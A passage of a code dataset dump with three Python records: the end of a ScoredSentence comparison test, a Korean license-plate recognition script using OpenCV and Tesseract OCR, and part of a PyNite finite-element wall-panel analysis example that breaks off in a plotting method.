sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = is_lt\n received = sent_a < sent_b\n\n assert received == expected\n\n @param_comp()\n def test___gt__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` greater-than\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = (not is_lt) and (not is_eq)\n received = sent_a > sent_b\n\n assert received == expected\n","sub_path":"tests/summarizer/test_scored_sentence.py","file_name":"test_scored_sentence.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181034118","text":"import cv2\r\nimport numpy as np\r\nimport pytesseract\r\nimport time\r\nfrom PIL import Image\r\n\r\n'''\r\ndef check():\r\n return \"파일 함수 불러오기는 했음\"\r\n''' \r\n# --Read Input Image--\r\ndef number_recognition(cut_image):\r\n src = cv2.imread(cut_image) #이미지 불러오기\r\n print(\"불러오기는 했음\")\r\n '''\r\n dst = src.copy() # 이미지영역을 반으로 자르기(번호판 인식률 속도를 높이기 위함)\r\n dst = src[480:960, 50:670]\r\n cv2.imshow(\"half img\", dst)\r\n cv2.waitKey(0)\r\n '''\r\n\r\n prevtime = time.time() # 걸린 시간 체크하는 함수\r\n\r\n # 변수 선언\r\n height, width, channel = src.shape # 이미지에 대한 값을 가질 변수\r\n\r\n numcheck = 0 # 반복문에서 번호판 문자열 검사할 변수\r\n charsok = 0 # 반복문에서 번호판 글자를 제대로 읽었는지 검사할 변수\r\n add_w_padding, add_h_padding = 0, 0 # 추가할 padding값을 가질 변수\r\n w_padding_max, h_padding_max = 0, 0 # 일정한 padding값을 가지게되었을때 반복문을 제어할 변수\r\n\r\n # --Convert Image to Grayscale-- (이미지 흑백변환)\r\n\r\n gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # 이미지 흑백변환\r\n\r\n # --Maximize Contrast(Optional)-- (흑백대비 최대화)\r\n\r\n structuringElement = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\r\n\r\n imgTopHat = cv2.morphologyEx(gray, cv2.MORPH_TOPHAT, structuringElement)\r\n imgBlackHat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, structuringElement)\r\n\r\n imgGrayscalePlusTopHat = cv2.add(gray, imgTopHat)\r\n gray = cv2.subtract(imgGrayscalePlusTopHat, imgBlackHat)\r\n\r\n # --Adaptive Thresholding-- (가우시안블러(이미지 노이즈 제거) 및 쓰레시 홀딩)\r\n\r\n img_blurred = cv2.GaussianBlur(gray, ksize=(5, 5), sigmaX=0) # GaussianBlur 적용\r\n\r\n img_thresh = cv2.adaptiveThreshold( # adaptiveThreshold 적용\r\n img_blurred,\r\n maxValue=255.0,\r\n adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\r\n thresholdType=cv2.THRESH_BINARY_INV,\r\n blockSize=19,\r\n C=9\r\n )\r\n\r\n # --Find Contours-- (윤곽선 찾기)\r\n\r\n contours, hierarchy = cv2.findContours( # opencv의 findContours를 이용하여 contours에 저장\r\n img_thresh,\r\n cv2.RETR_LIST,\r\n cv2.CHAIN_APPROX_SIMPLE\r\n )\r\n\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8) # numpy.zeros를 이용하여 윤곽선 범위 저장\r\n\r\n cv2.drawContours(temp_result, contours, -1, (255, 255, 255)) # 윤곽선 그리기\r\n\r\n # --Prepare Data-- (데이터 비교하기, 글자영역으로 추정되는 rectangle 그리기)\r\n\r\n temp_result = np.zeros((height, width, channel),\r\n dtype=np.uint8) # drawContours를 이용해 그린 윤곽선에 다시 numpy.zeros를 이용해 다시 윤곽선 범위 저장 (안하면 윤곽선 좀 남아있음)\r\n\r\n contours_dict = [] # contour 정보를 모두 저장받을 리스트 변수\r\n\r\n for contour in contours:\r\n x, y, w, h = cv2.boundingRect(contour) # 위치 높낮이 데이터 정보 저장\r\n cv2.rectangle(temp_result, pt1=(x, y), pt2=(x + w, y + h), color=(255, 255, 255),\r\n thickness=2) # 윤곽선을 감싸는 사각형 구하기\r\n\r\n # insert to dict\r\n contours_dict.append({ # contour 정보를 모두 저장\r\n 'contour': contour,\r\n 'x': x,\r\n 'y': y,\r\n 'w': w,\r\n 'h': h,\r\n 'cx': x + (w / 2),\r\n 'cy': y + (h / 2)\r\n })\r\n\r\n # --Select Candidates by Char Size-- (글자 같은 영역 찾기)\r\n\r\n MIN_AREA = 80 # 윤곽선의 가운데 렉트 최소 넓이 80\r\n MIN_WIDTH, MIN_HEIGHT = 2, 8 # 바운드 렉트의 최소 너비와 높이는 2, 8\r\n MIN_RATIO, MAX_RATIO = 0.25, 1.0 # 바운드 렉트의 비율 가로 대비 세로 비율 최솟값 0.25, 최댓값 1.0\r\n\r\n possible_contours = [] # 글자로 예상되는 contour들을 저장받을 리스트 변수\r\n\r\n cnt = 0 # count 변수\r\n for d in contours_dict: # contours_dict에 저장된 것을 조건에 맞다면 possible_contours에 append\r\n area = d['w'] * d['h']\r\n ratio = d['w'] / d['h']\r\n\r\n if area > MIN_AREA \\\r\n and d['w'] > MIN_WIDTH and d['h'] > MIN_HEIGHT \\\r\n and MIN_RATIO < ratio < MAX_RATIO:\r\n d['idx'] = cnt\r\n cnt += 1\r\n possible_contours.append(d)\r\n\r\n # visualize possible contours\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\r\n\r\n for d in possible_contours:\r\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\r\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(d['x'] + d['w'], d['y'] + d['h']), color=(255, 255, 255),\r\n thickness=2) # 글자로 예상되는 영역만 rectangle 그리기\r\n\r\n # --Select Candidates by Arrangement of Contours-- (글자의 연속성(번호판으로 예상되는 영역) 찾기)\r\n\r\n MAX_DIAG_MULTIPLYER = 4.7 # 5 contour와 contour의 사이의 길이 (값계속 바꿔가면서 테스트 해야함)\r\n MAX_ANGLE_DIFF = 13 # 12.0 첫번째 contour와 두번째 contour의 직각 삼각형의 앵글 세타각도\r\n MAX_AREA_DIFF = 0.5 # 0.5 면적의 차이\r\n MAX_WIDTH_DIFF = 0.8 # 0.8 contour 간의 가로길이 차이\r\n MAX_HEIGHT_DIFF = 0.2 # 0.2 contour 간의 세로길이 차이\r\n MIN_N_MATCHED = 4 # 3 글자영역으로 예측된 것의 최소 갯수 (ex 3개이상이면 번호판일 것)\r\n\r\n def find_chars(contour_list): # 재귀함수로 번호판 후보군을 계속 찾음\r\n matched_result_idx = [] # 최종 결과값의 인덱스를 저장\r\n\r\n for d1 in contour_list: # 컨투어(d1, d2)를 서로 비교\r\n matched_contours_idx = []\r\n for d2 in contour_list:\r\n if d1['idx'] == d2['idx']:\r\n continue\r\n\r\n dx = abs(d1['cx'] - d2['cx'])\r\n dy = abs(d1['cy'] - d2['cy'])\r\n\r\n diagonal_length1 = np.sqrt(d1['w'] ** 2 + d1['h'] ** 2)\r\n\r\n distance = np.linalg.norm(\r\n np.array([d1['cx'], d1['cy']]) - np.array([d2['cx'], d2['cy']])) # d1과 d2거리를 계산\r\n if dx == 0: # dx의 절댓값이 0이라면 (d1과 d2의 x값을 갖고 있다면)\r\n angle_diff = 90\r\n else:\r\n angle_diff = np.degrees(np.arctan(dy / dx)) # 아크탄젠트 값을 구함 (라디안)\r\n area_diff = abs(d1['w'] * d1['h'] - d2['w'] * d2['h']) / (d1['w'] * d1['h']) # 면적의 비율\r\n width_diff = abs(d1['w'] - d2['w']) / d1['w'] # 너비의 비율\r\n height_diff = abs(d1['h'] - d2['h']) / d1['h'] # 높이의 비율\r\n\r\n if distance < diagonal_length1 * MAX_DIAG_MULTIPLYER \\\r\n and angle_diff < MAX_ANGLE_DIFF and area_diff < MAX_AREA_DIFF \\\r\n and width_diff < MAX_WIDTH_DIFF and height_diff < MAX_HEIGHT_DIFF:\r\n matched_contours_idx.append(d2['idx']) # 설정한 파라미터 기준에 맞는 값들의 인덱스만 append\r\n\r\n # append this contour\r\n matched_contours_idx.append(d1['idx']) # d1을 빼먹고 넣었으므로 d1도 넣어줌\r\n\r\n if len(matched_contours_idx) < MIN_N_MATCHED: # 예상한 번호판의 최소 갯수가 맞지 않다면 continue\r\n continue\r\n\r\n matched_result_idx.append(matched_contours_idx) # 최종후보군으로 넣음 append\r\n\r\n unmatched_contour_idx = [] # 최종 후보군이 아닌 것들도 아닌 것들끼리 한번 더 비교\r\n for d4 in contour_list:\r\n if d4['idx'] not in matched_contours_idx: # matched_contour_idx가 아닌 것들\r\n unmatched_contour_idx.append(d4['idx'])\r\n\r\n unmatched_contour = np.take(possible_contours,\r\n unmatched_contour_idx) # numpy.take를 이용해서 unmathced_contour에 저장\r\n\r\n # recursive\r\n recursive_contour_list = find_chars(unmatched_contour) # 다시 돌려봄\r\n\r\n for idx in recursive_contour_list:\r\n matched_result_idx.append(idx) # 최종 결과값을 mathced_result_idx에 다시 저장\r\n\r\n break\r\n\r\n return matched_result_idx\r\n\r\n result_idx = find_chars(possible_contours)\r\n\r\n matched_result = [] # 예상되는 번호판 contour정보를 담을 리스트 변수\r\n for idx_list in result_idx:\r\n matched_result.append(np.take(possible_contours, idx_list))\r\n\r\n # visualize possible contours (번호판 contour 그리기)\r\n temp_result = np.zeros((height, width, channel), dtype=np.uint8)\r\n\r\n for r in matched_result: # 번호판으로 예상되는 역역을 그림\r\n for d in r:\r\n # cv2.drawContours(temp_result, d['contour'], -1, (255, 255, 255))\r\n cv2.rectangle(temp_result, pt1=(d['x'], d['y']), pt2=(d['x'] + d['w'], d['y'] + d['h']),\r\n color=(255, 255, 255),\r\n thickness=2)\r\n\r\n # --Rotate Plate Images-- (이미지 회전)\r\n\r\n plate_imgs = [] # 번호판 이미지를 담을 리스트 변수\r\n plate_infos = [] # 번호판 정보를 담을 리스트 ���수\r\n\r\n longest_idx, longest_text = -1, 0 # idx값 초기화\r\n plate_chars = [] # 번호판 리스트 변수\r\n\r\n while charsok == 0: # 번호판 글자로 예상되는 값이 나올 때까지 반복\r\n PLATE_WIDTH_PADDING = 1.267 + add_w_padding # 가로 패딩 값 예제 디폴트는 1.3\r\n PLATE_HEIGHT_PADDING = 1.51 + add_h_padding # 세로 패딩 값 예제 디폴트는 1.5\r\n MIN_PLATE_RATIO = 3 # 3 최소 번호판 비율\r\n MAX_PLATE_RATIO = 10 # 10 최대 번호판 비율\r\n\r\n for i, matched_chars in enumerate(matched_result):\r\n sorted_chars = sorted(matched_chars, key=lambda x: x['cx'])\r\n\r\n plate_cx = (sorted_chars[0]['cx'] + sorted_chars[-1]['cx']) / 2\r\n plate_cy = (sorted_chars[0]['cy'] + sorted_chars[-1]['cy']) / 2\r\n\r\n plate_width = (sorted_chars[-1]['x'] + sorted_chars[-1]['w'] - sorted_chars[0]['x']) * PLATE_WIDTH_PADDING\r\n\r\n sum_height = 0\r\n for d in sorted_chars:\r\n sum_height += d['h']\r\n\r\n plate_height = int(sum_height / len(sorted_chars) * PLATE_HEIGHT_PADDING)\r\n\r\n triangle_height = sorted_chars[-1]['cy'] - sorted_chars[0]['cy'] # 번호판의 간격을 삼각형을 기준으로 세타 값을 구함\r\n triangle_hypotenus = np.linalg.norm(\r\n np.array([sorted_chars[0]['cx'], sorted_chars[0]['cy']]) -\r\n np.array([sorted_chars[-1]['cx'], sorted_chars[-1]['cy']])\r\n )\r\n\r\n angle = np.degrees(np.arcsin(triangle_height / triangle_hypotenus)) # 라디안 값을 구해서 각도로 바꿈\r\n\r\n rotation_matrix = cv2.getRotationMatrix2D(center=(plate_cx, plate_cy), angle=angle,\r\n scale=1.0) # 로테이션 이미지 구하기\r\n\r\n img_rotated = cv2.warpAffine(img_thresh, M=rotation_matrix, dsize=(width, height)) # 이미지 변형\r\n\r\n img_cropped = cv2.getRectSubPix( # 회전된 이미지에서 원하는 부분만 자름\r\n img_rotated,\r\n patchSize=(int(plate_width), int(plate_height)),\r\n center=(int(plate_cx), int(plate_cy))\r\n )\r\n\r\n if img_cropped.shape[1] / img_cropped.shape[0] < MIN_PLATE_RATIO or img_cropped.shape[1] / \\\r\n img_cropped.shape[\r\n 0] < MIN_PLATE_RATIO > MAX_PLATE_RATIO: # 번호판 비율이 맞지 않다면 continue\r\n continue\r\n\r\n plate_imgs.append(img_cropped) # plate_imgs에 append\r\n\r\n plate_infos.append({ # plate_infos에 append\r\n 'x': int(plate_cx - plate_width / 2),\r\n 'y': int(plate_cy - plate_height / 2),\r\n 'w': int(plate_width),\r\n 'h': int(plate_height)\r\n })\r\n\r\n # --Another Thresholding to Find Chars-- (찾은문자에서 다시 쓰레시홀딩)\r\n\r\n for i, plate_img in enumerate(plate_imgs):\r\n if numcheck > 3: # 예상되는 번호판 영역에서 문자열을 검사해 숫자 3개가 넘는다면(번호판일 확률이 높다면)\r\n break\r\n\r\n plate_img = cv2.resize(plate_img, dsize=(0, 0), fx=1.6, fy=1.6)\r\n _, plate_img = cv2.threshold(plate_img, thresh=0.0, maxval=255.0,\r\n type=cv2.THRESH_BINARY | cv2.THRESH_OTSU) # 쓰레시홀딩\r\n\r\n # find contours again (same as above)\r\n contours, hierarchy = cv2.findContours(plate_img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) # contour 다시 찾기\r\n\r\n plate_min_x, plate_min_y = plate_img.shape[1], plate_img.shape[0]\r\n plate_max_x, plate_max_y = 0, 0\r\n\r\n for contour in contours:\r\n x, y, w, h = cv2.boundingRect(contour) # for문을 돌려 boundingRect를 다시 구함\r\n\r\n area = w * h # 면적\r\n ratio = w / h # 비율\r\n\r\n if area > MIN_AREA \\\r\n and w > MIN_WIDTH and h > MIN_HEIGHT \\\r\n and MIN_RATIO < ratio < MAX_RATIO: # 설정한 기준(파라미터)에 맞는지 다시 확인\r\n if x < plate_min_x: # x, y의 최댓값,최소값을 구함\r\n plate_min_x = x\r\n if y < plate_min_y:\r\n plate_min_y = y\r\n if x + w > plate_max_x:\r\n plate_max_x = x + w\r\n if y + h > plate_max_y:\r\n plate_max_y = y + h\r\n\r\n img_result = plate_img[plate_min_y:plate_max_y, plate_min_x:plate_max_x] # 이미지를 번호판 부분만 잘라내기\r\n\r\n img_result = cv2.GaussianBlur(img_result, ksize=(3, 3), sigmaX=0) # GaussianBlur(노이즈 제거)\r\n _, img_result = cv2.threshold(img_result, thresh=0.0, maxval=255.0,\r\n type=cv2.THRESH_BINARY | cv2.THRESH_OTSU) # 쓰레시홀딩 한번 더\r\n img_result = cv2.copyMakeBorder(img_result, top=10, bottom=10, left=10, right=10,\r\n borderType=cv2.BORDER_CONSTANT, # 이미지에 패딩(여백)을 줌\r\n value=(0, 0, 0)) # 검은색\r\n\r\n cv2.imwrite('00.jpg', img_result)\r\n chars = pytesseract.image_to_string(Image.open('00.jpg'), config='--psm 7 --oem 0',\r\n lang='kor') # 저장한 이미지를 불러 pytesseract로 읽음\r\n nowtime = time.time()\r\n print(\"이미지 불러 온 후 글자 : \" + chars)\r\n\r\n result_chars = '' # 번호판 인식 문자 정보를 담을 변수\r\n has_digit = False\r\n for c in chars: # 판독해서 특수문자를 제외한 한글 문자와 숫자 넣기\r\n if ord('가') <= ord(c) <= ord('힣') or c.isdigit(): # 숫자나 한글이 포함되어 있는지\r\n if c.isdigit():\r\n has_digit = True # 숫자가 하나라도 있는지\r\n result_chars += c\r\n\r\n for n in range(len(result_chars)): # 번호판 형식이 맞는지 다시한번 검사 및 문자열 자르기\r\n if len(result_chars) < 7: # 번호판 길이가 7자리(번호판의 최소 길이는 7자리)보다 짧다면\r\n break\r\n elif result_chars[0].isdigit() == False: # 첫문자가 문자라면(숫자가 아니라면) 자르기\r\n result_chars = result_chars[1:result_chars.__len__()]\r\n\r\n elif result_chars[len(result_chars) - 1].isdigit() == False: # 마지막 문자가 한글데이터라면(숫자가 아니라면) 자르기\r\n result_chars = result_chars[0:(result_chars.__len__() - 1)]\r\n\r\n plate_chars.append(result_chars) # 결과 result_chars를 plate_chars에 append\r\n\r\n for j in range(len(result_chars)): # 번호판의 배열이 나오는지를 검사 ex) 12가3456(7자리번호판) or 123가4567(8자리번호판)\r\n if len(result_chars) < 7: # 결과길이가 7자리(번호판의 최소 길이는 7자리)보다 짧다면\r\n break\r\n elif (j == 2 and result_chars[j].isdigit() == True) and result_chars[\r\n j + 1].isdigit() == True: # 번호판의 3번째와 4번째가 동시에 숫자라면(글자가 아니라면)\r\n break\r\n elif (j != 2 and j != 3) and result_chars[j].isdigit() == False: # 번호판의 3,4번째(글자영역)가 아닌데 문자라면\r\n break\r\n elif (j == 2 and result_chars[j].isdigit() == False) and result_chars[\r\n j + 1].isdigit() == False: # 번호판의 3,4번째자리가 둘 다 문자라면\r\n break\r\n if 6 <= j and result_chars[j].isdigit() == True: # 6번째까지 숫자자리에 문자가 없고 7번째 영역이 숫자라면 번호판일 것\r\n charsok = 1 # 반복문을 멈춤\r\n break\r\n\r\n if has_digit and len(result_chars) > longest_text: # 조건을 만족하면\r\n longest_idx = i # 가장 긴 값을 인덱스로 줌\r\n\r\n for numch, in result_chars: # 문자열 검사를 통해 숫자가 3개 이상이라면 번호판일 확률이 높으므로 이 plate_imgs는 번호판일 것임 그러므로 패딩값을 조절하면 되기에 이미지는 고정할 것\r\n if numch.isdigit() == True:\r\n numcheck += 1\r\n\r\n # --Result-- (결과값)\r\n\r\n info = plate_infos[longest_idx] # 번호판 좌표 정보 담기\r\n chars = plate_chars[longest_idx] # 번호판 문자열 정보 담기\r\n\r\n # 가로 패딩값을 0.1씩 늘림 -> 가로를 초기화 후 세로 패딩값을 0.1씩 늘림 -> 가로 세로 패딩값을 0.1씩 늘림 모두 0.6이 되면 프로그램 종료\r\n if add_w_padding <= 0.6 and w_padding_max == 0: # w패딩이 0.5보다 작다면 (가로 패딩만 먼저 늘려보기)\r\n add_w_padding += 0.1 # w패딩을 0.1씩 증가\r\n\r\n elif w_padding_max == 1 and add_h_padding <= 0.6 and h_padding_max == 0: # w패딩이 0.5를 찍고 h패딩이 0.5보다 작다면\r\n add_w_padding = 0 # w패딩을 다시 Default값으로 (세로 패딩만 늘려보기)\r\n add_h_padding += 0.1 # h패딩을 0.1씩 증가\r\n\r\n if add_w_padding == 0.6: # 0.6까지 늘어났다면\r\n w_padding_max = 1\r\n if add_h_padding == 0.6: # 0.6까지 늘어났다면\r\n h_padding_max = 1\r\n add_w_padding = 0\r\n add_h_padding = 0\r\n\r\n if w_padding_max == 1 and h_padding_max == 1: # 너비높이 0.1씩 증��시키기\r\n add_w_padding += 0.1\r\n add_h_padding += 0.1\r\n if add_w_padding == 0.6 and add_h_padding == 0.6: # 패딩값을 너비 높이 다 0.6씩 늘렸다면(번호판을 못 찾았다면)\r\n break\r\n # 초기화\r\n numcheck = 0\r\n plate_imgs = []\r\n plate_chars = []\r\n\r\n sec = nowtime - prevtime\r\n print(\"걸린시간 %0.5f\" % sec)\r\n print(\"최종 값 : \" + chars)\r\n\r\n img_out = src.copy()\r\n cv2.rectangle(img_out, pt1=(info['x'], info['y']), pt2=(info['x'] + info['w'], info['y'] + info['h']),\r\n color=(255, 0, 0), thickness=2) # 원본 이미지에 번호판 영역 그리기\r\n\r\n cv2.imwrite('result.jpg', img_out) #원본 이미지에서 번호판 영역 추출한 사진","sub_path":"NumberPlate.py","file_name":"NumberPlate.py","file_ext":"py","file_size_in_byte":20134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"605014515","text":"#%%\n# This is an example of a how quads can be used to create a wall panel for out-of-plane bending problems.\n# A 'RectWall' class has been defined to automate the process of meshing, loading, and plotting results for a wall\n# panel of any geometry and edge support conditions. At the bottom of this file (below the class\n# definition) is a brief script showing how the 'RectWall' class can be been implemented, as well\n# as a discussion of the nuances of quad elements the user should be aware of.\n\n#%%\nfrom PyNite import FEModel3D, Node3D, Quad3D\n\n# Packages used for plotting contours\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\n#%%\nclass RectWall():\n\n # Constructor\n def __init__(self, width, height, thickness, E=3824, nu=0.17, mesh_size=1, bot_support='Pinned', top_support='Pinned', left_support='Free', right_support='Free'):\n\n self.width = width\n self.height = height\n self.thickness = thickness\n self.mesh_size = mesh_size\n\n self.E = E\n self.nu = nu\n\n self.fem = FEModel3D() # A finite element model for the wall\n\n self.loads = [] # A list of surface loads applied to the wall panel\n self.nodes = [] # A list of nodes that make up the wall panel\n self.quads = [] # A list of quadrilaterals that make up the wall panel\n\n self.bot_support = bot_support\n self.top_support = top_support\n self.left_support = left_support\n self.right_support = right_support\n\n self.__analyzed = False\n \n # Adds a pressure load to the wall\n def add_load(self, y_bot, y_top, p_bot, p_top):\n \n # Add the load to the wall\n self.loads.append((y_bot, y_top, p_bot, p_top))\n self.__analyzed = False\n \n # Removes all loads from the wall\n def clear_loads(self):\n\n # Clear all the wall loads\n self.loads = []\n self.__analyzed = False\n self.fem.ClearLoads()\n \n # Descritizes the wall\n def __descritize(self):\n\n # Determine how many columns of quads are necessary\n num_cols = round(self.width/self.mesh_size)\n\n # Determine the quad width\n pl_width = self.width/num_cols\n\n # Create a list to store mesh control points along the height of the wall\n # and add the top and bottom of the wall to the list\n y = [0.0, self.height]\n\n # Add a control point for each height where the load changes\n for load_item in self.loads:\n\n # Add the load start and end locations\n y.append(load_item[0])\n y.append(load_item[1])\n\n # Remove duplicates from the list of control points\n y = list(set(y))\n \n # Sort the list\n y.sort()\n\n # Prepare to iterate through each control point after the first one\n iter_y = iter(y)\n next(iter_y)\n y_prev = 0.0\n\n # Initialize the quad and node ID's to 1\n pl_id = 1\n node_id = 1\n\n # Create the bottom row of nodes\n for i in range(num_cols + 1):\n self.fem.AddNode('N'+str(node_id), i*pl_width, 0.0, 0.0)\n node_id += 1\n\n # Add quads and nodes between each control point\n for control_point in iter_y:\n\n # Determine the height between control points (\"lift\" height)\n h = control_point - y_prev\n\n # Determine how many rows of quads are needed in the lift\n num_rows = max(1, round(h/self.mesh_size))\n\n # Determine the quad height\n pl_height = h/num_rows\n\n # Generate nodes\n for j in range(num_rows + 1):\n for i in range(num_cols + 1):\n \n # The first row of nodes in the lift has already been generated\n if j != 0:\n\n # Generate the node\n self.fem.AddNode('N'+str(node_id), i*pl_width, j*pl_height + y_prev, 0.0)\n node_id += 1\n \n # Generate quadrilaterals\n for j in range(num_rows):\n for i in range(num_cols):\n\n # Determine which nodes the quadrilateral will be attached to\n ni = pl_id + max(0, int((pl_id - 1)/num_cols))\n nj = ni + 1\n nm = nj + (num_cols + 1)\n nn = nm - 1\n\n # Add the quadrilateral to the list of quadrilaterals\n self.fem.AddQuad('Q'+str(pl_id), 'N'+str(ni), 'N'+str(nj), 'N'+str(nm), 'N'+str(nn), self.thickness, self.E, self.nu) \n\n # Prepare to move to the next iteration\n pl_id += 1\n \n # Prepare for the next iteration\n y_prev = control_point\n\n # Defines support conditions at each node\n def __define_supports(self):\n\n # Step through each node in the model\n for node in self.fem.Nodes.values():\n\n # Determine if the node falls on any of the boundaries\n # Left edge\n if np.isclose(node.X, 0.0):\n if self.left_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.left_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Right edge\n elif np.isclose(node.X, self.width):\n if self.right_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.right_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Bottom edge\n elif np.isclose(node.Y, 0.0):\n if self.bot_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.bot_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n # Top edge\n elif np.isclose(node.Y, self.height):\n if self.top_support == \"Fixed\":\n node.SupportDX, node.SupportDY, node.SupportDZ, node.SupportRX, node.SupportRY = True, True, True, True, True\n elif self.top_support == \"Pinned\":\n node.SupportDX, node.SupportDY, node.SupportDZ = True, True, True\n \n # The next line can be uncommented to test skewed grids\n # node.X = node.X - node.Y*0.1\n\n # Analyzes the wall\n def analyze(self):\n\n # Descritize the wall\n self.__descritize()\n\n # Add supports to the wall\n self.__define_supports()\n\n # Add quad loads to the model\n for quad in self.fem.Quads.values():\n\n i_node = quad.iNode\n j_node = quad.jNode\n m_node = quad.mNode\n n_node = quad.nNode\n\n # Calculate the average Y coordinate of the four nodes\n avgY = (i_node.Y + j_node.Y + m_node.Y + n_node.Y)/4\n\n # Add quad surface loads to the model\n pressure = 0\n for load in self.loads:\n \n y1 = load[0]\n y2 = load[1]\n p1 = load[2]\n p2 = load[3]\n\n # Calculate the pressure on the quad and the load it applied to each of its nodes\n if avgY <= y2 and avgY >= y1:\n\n # Calculate the pressure the quadrilateral\n pressure += (p2 - p1)/(y2 - y1)*(avgY - y1) + p1\n \n # Add the surface pressure to the quadrilateral\n quad.pressures.append([pressure, 'Case 1'])\n\n # Analyze the model\n self.fem.Analyze(sparse=True)\n\n # Find the maximum displacement\n DZ = self.fem.Nodes['N1'].DZ['Combo 1']\n for node in self.fem.Nodes.values():\n if abs(node.DZ['Combo 1']) > abs(DZ):\n DZ = node.DZ['Combo 1']\n\n print('Max Displacement:', DZ)\n\n # Creates a contour plot of the wall forces\n def plot_forces(self, force_type):\n \"\"\"\n Returns a plot of the wall's internal forces\n \"\"\"\n \n # Determine the total number of nodes in the wall\n num_nodes = len(self.fem.Nodes)\n\n # Create a list of unique node X-coordinates\n x = []\n for i in range(num_nodes):\n x.append(self.fem.Nodes['N' + str(i + 1)].X)\n if self.fem.Nodes['N' + str(i + 2)].X < self.fem.Nodes['N' + str(i + 1)].X:\n break\n \n # Get the number of columns of nodes\n num_cols = len(x)\n \n # Determine how many rows of nodes\n num_rows = int(round(num_nodes/num_cols, 0))\n\n # Initialize a list of unique Y-coordinates\n y = [self.fem.Nodes['N1'].Y]\n y_prev = self.fem.Nodes['N1'].Y\n\n # Initialize the list of node force results\n z = []\n\n # Determine which index in the 'M' vector we're interested in\n if force_type == 'Mx':\n index = 0\n elif force_type == 'My':\n index = 1\n elif force_type == 'Mxy':\n index = 2\n elif force_type == 'Qx':\n index = 0\n elif force_type == 'Qy':\n index = 1\n\n # Step through each node\n for node in self.fem.Nodes.values():\n\n # Add unique node Y-coordinates as we go\n if node.Y > y_prev:\n y.append(node.Y)\n y_prev = node.Y\n \n # Initialize the force at the node to zero\n force = 0\n count = 0\n\n # Find the quadrilaterals that attach to the node\n for quad in self.fem.Quads.values():\n\n # Sum quad corner forces at the node\n if quad.iNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(-1, -1, 'Combo 1')[index][0]\n else:\n force += quad.moment(-1, -1, 'Combo 1')[index][0]\n count += 1\n elif quad.jNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(1, -1, 'Combo 1')[index][0]\n else:\n force += quad.moment(1, -1, 'Combo 1')[index][0]\n count += 1\n elif quad.mNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(1, 1, 'Combo 1')[index][0]\n else:\n force += quad.moment(1, 1, 'Combo 1')[index][0]\n count += 1\n elif quad.nNode.ID == node.ID:\n if force_type == 'Qx' or force_type == 'Qy':\n force += quad.shear(-1, 1, 'Combo 1')[index][0]\n else:\n force += quad.moment(-1, 1, 'Combo 1')[index][0]\n count += 1\n\n # Calculate the average force at the node to smooth the results\n force = force/count\n\n # Add the total force at the node to the list of forces\n z.append(force)\n\n # Convert the lists to numpy arrays\n x = np.array(x)\n y = np.array(y)\n z = np.array(z)\n\n # Create a meshgrid for the X and Y-coordinates\n X, Y = np.meshgrid(x, y)\n\n # Reshape the node force results to fit the meshgrid\n z = z.reshape(num_rows, num_cols)\n\n fig, ax = plt.subplots()\n cs = ax.contourf(X, Y, z) #, 5)\n plt.colorbar(cs)\n ax.set(xlim=[0, max(x)], ylim=[0, max(y)], aspect=1)\n ax.set_title(force_type)\n plt.show()\n\n def plot_disp(self):\n \n # Determine the total number of nodes in the wall\n num_nodes = len(self.fem.Nodes)\n\n # Create a list of unique node X-coordinates\n x = []\n for i in range(num_nodes):\n x.append(self.fem.Nodes['N' + str(i + 1)].X)\n if self.fem.Nodes['N' + str(i + 2)].X < self.fem.Nodes['N' + str(i + 1)].X:\n break\n \n # Get the number of columns of nodes\n num_cols = len(x)\n \n # Determine how many rows of nodes\n num_rows = int(round(num_nodes/num_cols, 0))\n\n # Initialize a list of unique Y-coordinates\n y = [self.fem.Nodes['N1'].Y]\n y_prev = self.fem.Nodes['N1'].Y\n\n # Initialize the list of node displacement results\n z = []\n\n # Step through each node\n for node in self.fem.Nodes.values():\n\n # Add unique node Y-coordinates as we go\n if node.Y > y_prev:\n y.append(node.Y)\n y_prev = node.Y\n\n disp = node.DZ['Combo 1']\n\n # Add the total force at the node to the list of forces\n z.append(disp)\n\n # Convert the lists to numpy arrays\n x = np.array(x)\n y = np.array(y)\n z = np.array(z)\n\n # Create a meshgrid for the X and Y-coordinates\n X, Y = np.meshgrid(x, y)\n\n # Reshape the node force results to fit the meshgrid\n z = z.reshape(num_rows, num_cols)\n\n fig, ax = plt.subplots()\n 